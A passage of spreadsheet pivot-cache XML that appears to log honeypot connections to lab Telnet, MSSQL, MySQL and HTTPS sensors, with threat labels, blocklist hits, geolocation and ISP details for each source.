    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="DL"/>
    <s v="Delhi"/>
    <s v="New Delhi"/>
    <s v="New Delhi"/>
    <s v="1261481"/>
    <s v="110001"/>
    <s v="28.6139"/>
    <s v="77.209"/>
    <s v="136285"/>
    <s v="KIPVT-AS-IN"/>
    <s v="Karunay Internet Pvt Ltd"/>
    <s v="corporate"/>
    <s v="Karunay Internet Pvt Ltd"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_MSSQl:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:678e:b6b"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2536"/>
    <x v="2536"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-08T20:34:41"/>
    <d v="2025-04-08T20:34:41"/>
    <d v="2025-04-08T20:34:41"/>
    <n v="1"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="True"/>
    <s v="{'korea.services.net': ['unknown']}"/>
    <n v="35"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="KR"/>
    <s v="South Korea"/>
    <s v="41"/>
    <s v="Gyeonggi-do"/>
    <s v="Seongnam-si"/>
    <s v="Seongnam-si (Jeongja-dong)"/>
    <s v="1897000"/>
    <s v="NA"/>
    <s v="37.3638"/>
    <s v="127.116"/>
    <s v="4766"/>
    <s v="KIXS-AS-KR"/>
    <s v="Korea Telecom"/>
    <s v="corporate"/>
    <s v="Kornet"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:d3e5:5c47"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2537"/>
    <x v="2537"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-08T20:25:34"/>
    <d v="2025-04-08T03:27:42"/>
    <d v="2025-04-08T20:25:34"/>
    <n v="2"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_TELNET_H26&amp;&amp;SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="True"/>
    <s v="{'korea.services.net': ['unknown']}"/>
    <n v="35"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="KR"/>
    <s v="South Korea"/>
    <s v="41"/>
    <s v="Gyeonggi-do"/>
    <s v="Seongnam-si"/>
    <s v="Seongnam-si (Buljeong-ro)"/>
    <s v="1897000"/>
    <s v="13606"/>
    <s v="37.3654"/>
    <s v="127.122"/>
    <s v="4766"/>
    <s v="Korea Telecom"/>
    <s v="Korea Telecom"/>
    <s v="business"/>
    <s v="Korea Telecom"/>
    <s v="2006-04-07"/>
    <s v="KORNET"/>
    <s v="None"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:799a:2c72"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2538"/>
    <x v="2538"/>
    <s v="NA&amp;&amp;ec2-13-217-143-81.compute-1.amazonaws.com"/>
    <x v="0"/>
    <d v="2025-04-08T20:21:15"/>
    <d v="2025-04-08T20:20:08"/>
    <d v="2025-04-08T20:21:15"/>
    <n v="2"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Suspicious Web Activity Detected"/>
    <s v="high"/>
    <s v="SMA-LAB_HTTPS_HC1"/>
    <s v="8443"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="NA"/>
    <s v="North America"/>
    <s v="US"/>
    <s v="United States"/>
    <s v="VA"/>
    <s v="Virginia"/>
    <s v="Loudoun"/>
    <s v="Ashburn"/>
    <s v="4744870"/>
    <s v="20149"/>
    <s v="39.0438"/>
    <s v="-77.4874"/>
    <s v="14618"/>
    <s v="Amazon.com, Inc."/>
    <s v="Amazon.com, Inc."/>
    <s v="hosting"/>
    <s v="Amazon Technologies Inc"/>
    <s v="2019-10-01"/>
    <s v="AT-88-Z"/>
    <s v="2021-02-10"/>
    <s v="connection&amp;&amp;GET"/>
    <s v="NA&amp;&amp;{Data_HTTPS:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="2005-08-18 02:10:45"/>
    <s v="2027-01-16 04:59:59"/>
    <s v="2024-01-29 18:09:26"/>
    <s v="['NS-1321.AWSDNS-37.ORG', 'NS-1670.AWSDNS-16.CO.UK', 'NS-27.AWSDNS-03.COM', 'NS-967.AWSDNS-56.NET']"/>
    <s v="MarkMonitor Inc."/>
    <s v="['clientDeleteProhibited https://icann.org/epp#clientDeleteProhibited', 'clientTransferProhibited https://icann.org/epp#clientTransferProhibited', 'clientUpdateProhibited https://icann.org/epp#clientUpdateProhibited', 'serverDeleteProhibited https://icann.org/epp#serverDeleteProhibited', 'serverTransferProhibited https://icann.org/epp#serverTransferProhibited', 'serverUpdateProhibited https://icann.org/epp#serverUpdateProhibited']"/>
    <s v="None"/>
    <x v="7"/>
    <s v="NA"/>
    <s v="None"/>
    <s v="::ffff:dd9:8f51"/>
    <s v="C-I_D"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2539"/>
    <x v="2539"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-08T20:14:37"/>
    <d v="2025-04-08T15:03:24"/>
    <d v="2025-04-08T20:14:37"/>
    <n v="2"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H39"/>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2004-09-06"/>
    <s v="BB-Multiplay"/>
    <s v="None"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:3b5d:ac99"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2540"/>
    <x v="2540"/>
    <s v="NA&amp;&amp;114-35-124-142.hinet-ip.hinet.net"/>
    <x v="0"/>
    <d v="2025-04-08T20:05:01"/>
    <d v="2025-01-21T06:36:47"/>
    <d v="2025-04-08T20:05:01"/>
    <n v="152"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web']&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_H2&amp;&amp;SMA-LAB_TELNET_H37&amp;&amp;SMA-LAB_TELNET_H21&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H4&amp;&amp;SMA-LAB_TELNET_H14&amp;&amp;SMA-LAB_TELNET_H34"/>
    <s v="23"/>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2008-04-18"/>
    <s v="HINET-NET"/>
    <s v="None"/>
    <s v="connection&amp;&amp;login"/>
    <s v="NA&amp;&amp;{Data_TELNET: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7223:7c8e"/>
    <s v="C-I_D"/>
    <s v="high&amp;&amp;low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2541"/>
    <x v="2541"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-08T19:59:00"/>
    <d v="2025-04-08T19:59:00"/>
    <d v="2025-04-08T19:59:00"/>
    <n v="1"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="True"/>
    <s v="{'b.barracudacentral.org': ['unknown']}"/>
    <n v="39"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="TH"/>
    <s v="Thailand"/>
    <s v="64"/>
    <s v="Sukhothai"/>
    <s v="Mueang Sukhothai"/>
    <s v="Ban Na"/>
    <s v="1156257"/>
    <s v="NA"/>
    <s v="17.0172"/>
    <s v="99.7328"/>
    <s v="23969"/>
    <s v="TOT-NET"/>
    <s v="TOT Public Company Limited"/>
    <s v="consumer"/>
    <s v="TOT Public Company Limited"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:b635:b789"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2542"/>
    <x v="2542"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-08T19:55:04"/>
    <d v="2025-04-08T19:55:04"/>
    <d v="2025-04-08T19:55:04"/>
    <n v="1"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="True"/>
    <s v="{'zen.spamhaus.org': ['unknown']}"/>
    <n v="33"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="MH"/>
    <s v="Maharashtra"/>
    <s v="Mumbai Suburban"/>
    <s v="Mumbai"/>
    <s v="1275339"/>
    <s v="400001"/>
    <s v="19.076"/>
    <s v="72.8777"/>
    <s v="9829"/>
    <s v="BSNL-NIB"/>
    <s v="MTNL Pool Through BSNL"/>
    <s v="corporate"/>
    <s v="Mahanagar Telephone Nigam Limited"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:783c:54c3"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2543"/>
    <x v="2543"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-08T19:50:40"/>
    <d v="2025-04-08T19:49:09"/>
    <d v="2025-04-08T19:50:40"/>
    <n v="3"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_MSSQL_HC1"/>
    <s v="1433"/>
    <s v="True"/>
    <s v="{'b.barracudacentral.org': ['unknown']&amp;&amp; 'z.mailspike.net': ['unknown']}"/>
    <n v="72"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="VN"/>
    <s v="Vietnam"/>
    <s v="45"/>
    <s v="Đồng Tháp Province"/>
    <s v="Sa Dec city"/>
    <s v="Sa Dec"/>
    <s v="1568212"/>
    <s v="NA"/>
    <s v="10.2908"/>
    <s v="105.756"/>
    <s v="7552"/>
    <s v="Viettel Group"/>
    <s v="Viettel Corporation"/>
    <s v="residential"/>
    <s v="VIETEL"/>
    <s v="2011-03-04"/>
    <s v="VIETTEL-VN"/>
    <s v="None"/>
    <s v="connection&amp;&amp;login"/>
    <s v="{Data_MSSQl:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:abf3:3acf"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2544"/>
    <x v="2544"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-08T19:50:00"/>
    <d v="2025-04-08T19:47:13"/>
    <d v="2025-04-08T19:50:00"/>
    <n v="4"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="KA"/>
    <s v="Karnataka"/>
    <s v="Bengaluru Urban"/>
    <s v="Bengaluru"/>
    <s v="1277333"/>
    <s v="560056"/>
    <s v="12.9716"/>
    <s v="77.5946"/>
    <s v="9829"/>
    <s v="Bharat Sanchar Nigam Ltd"/>
    <s v="BSNL Internet"/>
    <s v="residential"/>
    <s v="NA"/>
    <s v="2007-08-01"/>
    <s v="Multiplay-Prepaid"/>
    <s v="None"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:75d1:188a"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2545"/>
    <x v="2545"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-08T19:34:44"/>
    <d v="2025-04-08T19:04:46"/>
    <d v="2025-04-08T19:34:44"/>
    <n v="4"/>
    <s v="SQTK_GTDN"/>
    <s v="['anonymous-proxy']&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_MYSQL_H13&amp;&amp;SMA-LAB_MYSQL_HC1"/>
    <s v="3306"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="True"/>
    <s v="vpn"/>
    <s v="medium"/>
    <s v="['anonymous-proxy']"/>
    <s v="EU"/>
    <s v="Europe"/>
    <s v="DE"/>
    <s v="Germany"/>
    <s v="NW"/>
    <s v="North Rhine-Westphalia"/>
    <s v="Düsseldorf District"/>
    <s v="Düsseldorf"/>
    <s v="2934246"/>
    <s v="40213"/>
    <s v="51.2277"/>
    <s v="6.77346"/>
    <s v="43357"/>
    <s v="Owl Limited"/>
    <s v="Mullvad"/>
    <s v="hosting"/>
    <s v="Mullvad VPN AB"/>
    <s v="2018-04-10"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;login"/>
    <s v="{Data_MYSQL:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:b9fe:4b21"/>
    <s v="C-I"/>
    <s v="medium"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2546"/>
    <x v="2546"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-08T19:31:58"/>
    <d v="2025-04-08T19:31:58"/>
    <d v="2025-04-08T19:31:58"/>
    <n v="1"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="True"/>
    <s v="{'b.barracudacentral.org': ['unknown']&amp;&amp; 'zen.spamhaus.org': ['unknown']}"/>
    <n v="73"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="TN"/>
    <s v="Tamil Nadu"/>
    <s v="Thanjavur"/>
    <s v="Peravurani"/>
    <s v="1259890"/>
    <s v="NA"/>
    <s v="10.2903"/>
    <s v="79.2016"/>
    <s v="9829"/>
    <s v="BSNL-NIB"/>
    <s v="Mahanagar Telephone Nigam Limited"/>
    <s v="corporate"/>
    <s v="Mahanagar Telephone Nigam Limited"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:7838:b1d4"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2547"/>
    <x v="2547"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-08T19:19:32"/>
    <d v="2025-04-08T19:15:52"/>
    <d v="2025-04-08T19:19:32"/>
    <n v="3"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_MSSQL_HC1"/>
    <s v="1433"/>
    <s v="True"/>
    <s v="{'b.barracudacentral.org': ['unknown']}"/>
    <n v="39"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="ID"/>
    <s v="Indonesia"/>
    <s v="PT"/>
    <s v="Central Papua"/>
    <s v="Mimika Regency"/>
    <s v="Timika"/>
    <s v="1623834"/>
    <s v="NA"/>
    <s v="-4.54676"/>
    <s v="136.884"/>
    <s v="7713"/>
    <s v="Telekomunikasi Indonesia (PT)"/>
    <s v="PT. TELKOM INDONESIA"/>
    <s v="business"/>
    <s v="NA"/>
    <s v="2009-04-20"/>
    <s v="TLKM_BB_INF_110_139"/>
    <s v="None"/>
    <s v="connection&amp;&amp;login"/>
    <s v="{Data_MSSQl:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:6e8b:fe17"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2548"/>
    <x v="2548"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-08T19:19:12"/>
    <d v="2025-04-08T19:19:12"/>
    <d v="2025-04-08T19:19:12"/>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dd:7f7a"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2549"/>
    <x v="2549"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-08T19:13:39"/>
    <d v="2025-02-08T07:33:51"/>
    <d v="2025-04-08T19:13:39"/>
    <n v="2"/>
    <s v="SQTK_GTDN"/>
    <s v="HoneyPot BlackListed IP&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="medium"/>
    <s v="SMA-LAB_TELNET_H47&amp;&amp;SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="medium"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="DL"/>
    <s v="Delhi"/>
    <s v="New Delhi"/>
    <s v="New Delhi (Janpath)"/>
    <s v="1261481"/>
    <s v="110001"/>
    <s v="28.6296"/>
    <s v="77.2183"/>
    <s v="9829"/>
    <s v="Bharat Sanchar Nigam Ltd"/>
    <s v="Mahanagar Telephone Nigam Limited"/>
    <s v="business"/>
    <s v="Mahanagar Telephone Nigam Limited"/>
    <s v="None"/>
    <s v="MTNL"/>
    <s v="None"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:3bb2:b1c"/>
    <s v="C-I_D"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2550"/>
    <x v="2550"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-08T18:56:10"/>
    <d v="2025-04-08T18:56:10"/>
    <d v="2025-04-08T18:56:10"/>
    <n v="1"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="True"/>
    <s v="{'b.barracudacentral.org': ['unknown']}"/>
    <n v="39"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="DL"/>
    <s v="Delhi"/>
    <s v="New Delhi"/>
    <s v="New Delhi (Block N)"/>
    <s v="1261481"/>
    <s v="110001"/>
    <s v="28.6309"/>
    <s v="77.2229"/>
    <s v="9829"/>
    <s v="BSNL-NIB"/>
    <s v="Bharat Sanchar Nigam Ltd"/>
    <s v="corporate"/>
    <s v="BSNL GSM EastZone"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:3b62:16bb"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2551"/>
    <x v="2551"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-08T18:53:58"/>
    <d v="2025-04-08T18:52:10"/>
    <d v="2025-04-08T18:53:58"/>
    <n v="3"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_MSSQL_HC1"/>
    <s v="1433"/>
    <s v="True"/>
    <s v="{'all.s5h.net': ['unknown']&amp;&amp; 'z.mailspike.net': ['unknown']&amp;&amp; 'zen.spamhaus.org': ['unknown']}"/>
    <n v="95"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="KA"/>
    <s v="Karnataka"/>
    <s v="Bengaluru Urban"/>
    <s v="Bengaluru"/>
    <s v="1277333"/>
    <s v="NA"/>
    <s v="12.9719"/>
    <s v="77.5937"/>
    <s v="24560"/>
    <s v="Bharti Airtel Limited"/>
    <s v="BHARTI"/>
    <s v="residential"/>
    <s v="ABTS (Karnataka)"/>
    <s v="2006-12-19"/>
    <s v="ABTS-KK-DSL-9102-blr"/>
    <s v="None"/>
    <s v="connection&amp;&amp;login"/>
    <s v="{Data_MSSQl:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:7aab:151c"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2552"/>
    <x v="2552"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-08T18:53:20"/>
    <d v="2025-04-08T18:53:20"/>
    <d v="2025-04-08T18:53:20"/>
    <n v="1"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="TR"/>
    <s v="Turkey"/>
    <s v="34"/>
    <s v="Istanbul"/>
    <s v="Beyoğlu"/>
    <s v="Istanbul"/>
    <s v="745044"/>
    <s v="34122"/>
    <s v="41.0315"/>
    <s v="28.9748"/>
    <s v="16135"/>
    <s v="TURKCELL-AS"/>
    <s v="Turkcell Iletisim Hizmetleri A.S."/>
    <s v="corporate"/>
    <s v="Turkcell Iletisim Hizmetleri"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:b05b:125e"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2553"/>
    <x v="2553"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-08T18:51:33"/>
    <d v="2025-04-08T18:51:33"/>
    <d v="2025-04-08T18:51:33"/>
    <n v="1"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="True"/>
    <s v="{'b.barracudacentral.org': ['unknown']&amp;&amp; 'spamsources.fabel.dk': ['unknown']}"/>
    <n v="77"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
